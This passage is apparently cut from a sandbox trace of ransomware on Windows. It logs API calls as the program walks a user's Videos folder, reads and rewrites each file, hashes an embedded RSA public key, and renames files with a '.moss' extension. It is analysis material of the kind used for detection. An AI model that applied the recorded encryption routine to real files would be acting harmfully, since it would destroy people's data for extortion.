(HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.859] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e778 | out: hHeap=0xcd0000) returned 1 [0172.859] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e790 | out: hHeap=0xcd0000) returned 1 [0172.859] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddb8 | out: hHeap=0xcd0000) returned 1 [0172.859] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0172.859] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48a18 | out: hHeap=0xcd0000) returned 1 [0172.859] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddb8 [0172.859] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd290 [0172.859] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e790 [0172.859] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0172.859] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x3b4e778 [0172.859] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2c0 [0172.859] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0x3aa26a0 [0172.859] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0172.859] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0172.859] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0172.859] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa27b8 [0172.860] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a50 [0172.860] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0172.860] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0172.860] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e790 | out: hHeap=0xcd0000) returned 1 [0172.860] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0172.860] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e778 | out: hHeap=0xcd0000) returned 1 [0172.860] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0172.860] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0172.860] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddb8 | out: hHeap=0xcd0000) returned 1 [0172.860] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.860] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0172.860] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0172.860] GetCurrentThreadId () returned 0x324 [0172.860] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35deb08 [0172.860] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0x3b546a0 [0172.860] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0172.860] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed88 [0172.860] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0xd23a00 [0172.860] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0172.860] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0172.860] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0172.860] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0172.860] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0172.860] GetCurrentThreadId () returned 0x324 [0172.860] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0172.860] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0172.861] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xdc53e8 [0172.861] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0172.861] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0172.861] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0172.861] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0172.861] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc53e8 | out: hHeap=0xcd0000) returned 1 [0172.861] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xdc53e8 [0172.861] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0172.861] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cad8 [0172.861] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0172.861] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd3e658 [0172.861] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0172.861] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddb8 [0172.861] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0172.861] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0172.861] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0172.861] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0172.861] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0172.861] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0172.861] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0172.861] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0172.861] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e778 [0172.861] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0172.861] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2e0 [0172.861] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0172.861] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0172.862] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0172.862] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0172.862] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0172.862] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e790 [0172.862] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0172.862] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0172.862] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0172.862] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e760 [0172.862] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0172.862] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4ddd0 [0172.862] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0172.862] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd320 [0172.862] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0172.862] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dd70 [0172.862] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0172.862] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dde8 [0172.862] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0172.862] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e7a8 [0172.862] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dd70 | out: hHeap=0xcd0000) returned 1 [0172.862] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4dd70 [0172.862] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dde8 | out: hHeap=0xcd0000) returned 1 [0172.862] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2f0 [0172.862] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0172.862] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0172.862] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0172.862] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0172.862] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e778 | out: hHeap=0xcd0000) returned 1 [0172.863] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e778 [0172.863] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0172.863] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b48a18 [0172.863] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddb8 | out: hHeap=0xcd0000) returned 1 [0172.863] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa26a0 [0172.863] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dd70 | out: hHeap=0xcd0000) returned 1 [0172.863] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b48c28 [0172.863] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.863] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0x3aa2470 [0172.863] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0172.863] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2588 [0172.863] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e778 | out: hHeap=0xcd0000) returned 1 [0172.863] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b48e40 [0172.863] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0172.863] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35be150 [0172.863] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0172.863] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed88 | out: hHeap=0xcd0000) returned 1 [0172.863] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc53e8 | out: hHeap=0xcd0000) returned 1 [0172.863] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35be150 | out: hHeap=0xcd0000) returned 1 [0172.863] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a10 | out: hHeap=0xcd0000) returned 1 [0172.864] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0172.864] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48c28 | out: hHeap=0xcd0000) returned 1 [0172.864] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48e40 | out: hHeap=0xcd0000) returned 1 [0172.864] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0172.864] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0172.864] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e7a8 | out: hHeap=0xcd0000) returned 1 [0172.864] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0172.864] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddd0 | out: hHeap=0xcd0000) returned 1 [0172.864] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0172.864] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e790 | out: hHeap=0xcd0000) returned 1 [0172.864] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e760 | out: hHeap=0xcd0000) returned 1 [0172.864] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0172.864] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0172.864] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f7c30 | out: hHeap=0xcd0000) returned 1 [0172.864] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e748 | out: hHeap=0xcd0000) returned 1 [0172.864] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b57918 | out: hHeap=0xcd0000) returned 1 [0172.864] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48a18 | out: hHeap=0xcd0000) returned 1 [0172.864] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd3e658 | out: hHeap=0xcd0000) returned 1 [0172.864] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cad8 | out: hHeap=0xcd0000) returned 1 [0172.864] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa27b8 | out: hHeap=0xcd0000) returned 1 [0172.864] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0172.864] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0172.864] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0172.864] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0172.864] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.864] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0172.865] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.865] WriteFile (in: hFile=0x664, lpBuffer=0x3b62d40*, nNumberOfBytesToWrite=0x9b48, lpNumberOfBytesWritten=0x401fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b62d40*, lpNumberOfBytesWritten=0x401fb14*=0x9b48, lpOverlapped=0x0) returned 1 [0172.865] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b62d40 | out: hHeap=0xcd0000) returned 1 [0172.865] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x9b4d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.865] WriteFile (in: hFile=0x664, lpBuffer=0x35deb08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35deb08*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.865] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0172.865] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0172.866] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\33BvA-jKWXb.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\wchwpgabs3kexe1f\\33bva-jkwxb.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\33BvA-jKWXb.swf.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\wchwpgabs3kexe1f\\33bva-jkwxb.swf.moss")) returned 1 [0172.866] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0172.866] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.866] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.868] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0172.868] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb47b41d0, ftCreationTime.dwHighDateTime=0x1d5e64b, ftLastAccessTime.dwLowDateTime=0x289bd310, ftLastAccessTime.dwHighDateTime=0x1d5e80c, ftLastWriteTime.dwLowDateTime=0x289bd310, ftLastWriteTime.dwHighDateTime=0x1d5e80c, nFileSizeHigh=0x0, nFileSizeLow=0x15495, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9r4Yw.avi", cAlternateFileName="")) returned 1 [0172.868] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\9r4Yw.avi") returned=".avi" [0172.868] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\9r4Yw.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\wchwpgabs3kexe1f\\9r4yw.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.868] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=87189) returned 1 [0172.868] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.872] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x1546f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.872] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.873] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x15495, lpOverlapped=0x0) returned 1 [0172.874] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.874] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ed88) returned 1 [0172.875] CryptCreateHash (in: hProv=0xd2ed88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.875] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.875] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.875] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.875] GetLastError () returned 0x0 [0172.875] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.875] CryptReleaseContext (hProv=0xd2ed88, dwFlags=0x0) returned 1 [0172.875] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.875] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.875] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.875] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.875] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.876] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.876] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x15495, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.876] WriteFile (in: hFile=0x664, lpBuffer=0x35deb08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35deb08*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.877] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0172.877] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\9r4Yw.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\wchwpgabs3kexe1f\\9r4yw.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\9r4Yw.avi.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\wchwpgabs3kexe1f\\9r4yw.avi.moss")) returned 1 [0172.878] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0172.878] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.878] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.879] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0172.879] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b6127c0, ftCreationTime.dwHighDateTime=0x1d5e53e, ftLastAccessTime.dwLowDateTime=0x409958f0, ftLastAccessTime.dwHighDateTime=0x1d5df35, ftLastWriteTime.dwLowDateTime=0x409958f0, ftLastWriteTime.dwHighDateTime=0x1d5df35, nFileSizeHigh=0x0, nFileSizeLow=0x15145, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="g6YWZzTvblVcc17ujwd.flv", cAlternateFileName="G6YWZZ~1.FLV")) returned 1 [0172.880] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\g6YWZzTvblVcc17ujwd.flv") returned=".flv" [0172.880] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\g6YWZzTvblVcc17ujwd.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\wchwpgabs3kexe1f\\g6ywzztvblvcc17ujwd.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.880] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=86341) returned 1 [0172.880] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.884] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x1511f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.884] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.885] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, 